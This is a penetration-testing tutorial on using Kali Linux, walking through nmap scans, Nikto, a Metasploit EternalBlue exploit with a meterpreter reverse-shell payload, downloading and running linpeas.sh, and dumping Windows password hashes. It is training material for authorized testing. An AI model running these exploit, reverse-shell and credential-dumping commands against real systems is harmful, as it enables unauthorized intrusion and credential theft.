How To Use Kali Linux

Mastering Kali Linux: Core Workflow for Penetration Testing

Kali Linux is an industry-standard platform for offensive security engineering, pre-loaded with over 600 specialized tools. The volume can overwhelm; efficiency depends on depth with a compact toolkit, not breadth across unused software.

Know Your Baseline: Terminal Proficiency and System Hygiene

Start with fundamentals. The CLI is non-negotiable—most automation and tool orchestration assumes command-line familiarity.

• Keep Kali current. Version lag is a risk factor—outdated scanners or exploits can yield inconclusive or misleading results. For Kali 2023.x:

  sudo apt update && sudo apt dist-upgrade -y
  

• Ad-hoc tool install: When reaching for tools outside the default install, stick to apt repositories for stability:

  sudo apt install nmap
  

  Note: Avoid random curl|bash installs unless you manually verify sources—tool supply-chain risk is real.

• Filesystem operations: Home for root is /root, not /home/root. Reporting, logs, drop files—verify permissions and paths:

  cd /root/reports
  mkdir 2024_siteA
  ls -lh
  

  Side effect: Multiple users on the same VM? Set sticky bits or segmented work dirs to avoid trampling artifacts.

Reconnaissance: Quick, Precise Network Intelligence

Forget tool fatigue. Nmap alone—if used well—covers 80% of initial target assessment.

Nmap, Version 7.94+ Preferred

• Ping sweep the subnet: Identify live hosts with minimum noise.

  nmap -sn 10.10.10.0/24 -oG sweep.gnmap
  

  • -sn: disable port scans, only host discovery
  • -oG: grepable output, works with custom parsing scripts

• Service and version enumeration:

  nmap -sS -sV -T4 10.10.10.12 -oN host12_services.txt
  

  • -T4: trade-off—aggressive timing, may trip IPS on a perimeter.
  • Always cross-verify "open|filtered" ports with a secondary scan.

• OS and script scan with output for later parsing:

  nmap -A -oX host12.xml 10.10.10.12
  

  XML output integrates with Dradis, Serpico, or custom parsers.

Whois & Dig: Domain Recon for Internet-Facing Targets

Use-case: Mapping an org’s external attack surface.

whois bigcorp.example | grep 'Tech Email'
dig +short MX bigcorp.example

Note: Whois privacy masks and registrar proxies are increasingly common—supplement with subdomain enumeration tools as needed.

Vulnerability Assessment: Fast-Track the Obvious

Automated scans catch low-hanging fruit, but require context.

• Nikto (2.5.0+) for web servers:

  nikto -h https://siteA.corp --output nikto_siteA.html
  

  Side note: Nikto is noisy. Unless authorized for intrusive scans, limit use to engagement rules of the client.

• Nmap Vulnerability Scripts:

  Preferred over heavyweight scanners for speed on constrained connections.

  nmap -p 445,139 --script=smb-vuln* 10.10.10.12 -oN smb_vuln_scan.txt
  

  Gotcha: NSE scripts rely on accurate port state—false negatives are possible if services run on non-default ports.

Exploitation: Consistent, Auditable with Metasploit

Metasploit Framework (6.x) is extensible but prone to bloat if left unchecked. Always validate modules, payload compatibility, and possible detection artifacts.

msfconsole
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.12
set LHOST 10.10.10.99
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

• Session handling:
  Meterpreter sessions (sessions -l, sessions -i 1) often fail due to AV/EDR—test stagers in a controlled lab first.
• Logs:
  /var/log/msf.log reveals module error output; check when modules hang on INIT.

Post-Exploitation: Escalation and Persistence (With Caution)

Privilege escalation and credential harvesting are high-impact. Always assess legal boundaries before using live targets.

• Linux privilege enumeration:
  linpeas.sh is de-facto, but must be transferred securely.

  wget http://local.lan/linpeas.sh
  chmod +x linpeas.sh
  ./linpeas.sh > linpeas_output.txt
  

• Windows credential dump:
  Meterpreter’s hashdump remains effective, though AV vendors increasingly block on memory access patterns.

  hashdump
  

  Alternate? Invoke-Mimikatz, but OPSEC considerations for memory-resident payloads (logs, blue team alerts).

Scripting: Simple Automation for Consistent Results

Manual scanning doesn’t scale. Bash or Python are preferred for repeatable scans, chaining tool output.

#!/bin/bash
while read ip; do
    echo "[*] Scanning $ip"
    nmap -sV -oN scans/${ip}_sv.txt $ip
done < targets.txt

• Store reusable snippets in /usr/local/bin or a versioned "ops" scripts folder.
• Known issue: With large scan lists, limit parallelism to avoid local TCP exhaustion.

Non-obvious tip: Use tmux or byobu for long-running scans, so lost SSH sessions don't kill jobs.

Organization: Segment Work, Control Output

Workspaces—especially within Metasploit—keep findings separate by engagement. Don't ignore simple structure (project dirs, timestamped logs).

Link findings with Markdown notes or Dradis for report prep.

Summary: Adopt a Core Workflow, Ignore the Tool Mirage

• Depth trumps quantity.
• Keep Kali and its tools up-to-date.
• Master Nmap, Metasploit, and at most one vulnerability scanner for daily work.
• Automate to avoid mistakes and improve reproducibility.
• Keep output organized and engagement artifacts reproducible.

Practical labs (e.g., HackTheBox, VulnHub) are worth more than endless "tool of the week" blogs. Side effect of this discipline: cleaner reports, happier clients.

Known alternative: Community forks and custom Kali builds offer bleeding-edge tools—only use if you can afford toolchain management overhead.

For advanced scripting, integration with CI for continuous security scans, or to discuss bypassing common EDR roadblocks, reach out directly.